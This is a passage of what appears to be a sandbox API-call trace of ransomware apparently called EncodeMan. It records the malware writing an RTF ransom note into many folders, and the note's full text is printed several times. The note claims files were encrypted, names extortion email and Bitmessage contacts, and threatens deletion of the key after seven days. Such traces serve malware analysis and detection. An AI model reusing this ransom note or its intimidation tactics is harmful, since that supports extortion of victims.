f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x86\x8f\x9e\x93?ç\x80q\x1cs\x05ÓGZ¸ºewN0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.279] WriteFile (in: hFile=0x2f4, lpBuffer=0x23688d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23688d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.280] CloseHandle (hObject=0x2f4) returned 1 [0297.280] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\#readme_eman#.rtf")) returned 0xffffffff [0297.280] GetLastError () returned 0x2 [0297.280] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0297.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.281] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23688d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES 